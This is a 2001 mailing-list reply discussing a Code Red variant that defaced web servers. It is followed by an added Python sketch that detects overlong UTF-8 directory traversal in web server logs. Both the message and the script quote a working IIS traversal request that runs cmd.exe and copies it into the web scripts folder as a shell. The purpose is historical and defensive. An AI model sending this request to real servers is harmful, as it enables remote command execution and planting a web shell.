Re: "Code Red" worm - there MUST be at least two versions.

From: Jon-o Addleman (jonathan.addlemanat_private)
Date: Fri Jul 20 2001 - 14:40:06 PDT

    On Fri, Jul 20, 2001 at 12:15:46PM -0600, Don Papp spake thusly:
    > 	I wonder if I have seen this variant - a person I emailed has a
    > server whose web pages served look a lot like the Code Red worm's output
    > (1 line of simple html) displaying
    > 
    > 	FUCK CHINA GOVERNENT
    > 	and p0isonb0x (or something like that)
    > 
    > 	On a black background.  The web files themselves are untouched.
    
    I think this was something else - maybe a similar worm, but it used
    a different attack:
    
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe" 404 -
    
    The machine that sent that to me had that same web page up, and I
    also got one from a different IP (on the same subnet) a few hours
    before that. That was a week ago though - July 13... 
    
    -- 
    Jon-o Addleman
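
Added example, not part of the original message: a log check for the request quoted above, where `%c0%af` is a non-shortest (overlong) UTF-8 encoding of `/` that hides the `..` path segments from a plain percent-decode. The function names and the benign sample line are assumptions made for this sketch, and it covers only the 2-byte overlong form seen in the message.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead bytes 0xC0 and 0xC1 can only start a 2-byte overlong encoding of an
# ASCII character, so they never appear in valid UTF-8.
OVERLONG_2BYTE = re.compile(rb"([\xc0\xc1])([\x80-\xbf])")

def fold_overlong(raw):
    """Replace each 2-byte overlong sequence with the ASCII byte it encodes.

    Returns (folded_bytes, number_of_sequences_replaced).
    """
    def repl(m):
        lead, cont = m.group(1)[0], m.group(2)[0]
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return OVERLONG_2BYTE.subn(repl, raw)

def has_dotdot(path_bytes):
    """True if any segment, split on / or \\, is exactly '..'."""
    return b".." in re.split(rb"[/\\]", path_bytes)

def inspect_request(request_line):
    """Classify one logged request line of the form 'METHOD target [protocol]'."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    path = target.split("?", 1)[0]          # only the path is normalized
    decoded = unquote_to_bytes(path)        # %c0%af -> b"\xc0\xaf"
    folded, n_overlong = fold_overlong(decoded)
    return {
        "overlong": n_overlong,                   # any value > 0 is worth an alert
        "naive_traversal": has_dotdot(decoded),   # what a plain decode sees
        "traversal": has_dotdot(folded),          # what the server-side decode sees
        "path": folded.decode("latin-1"),
    }

# Request line as quoted in the message above.
QUOTED = (r"GET /scripts/..%c0%af../winnt/system32/cmd.exe"
          r"?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe")
# Constructed benign line for comparison.
BENIGN = "GET /scripts/report.asp?id=7 HTTP/1.0"

if __name__ == "__main__":
    for line in (QUOTED, BENIGN):
        print(inspect_request(line))
```
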
    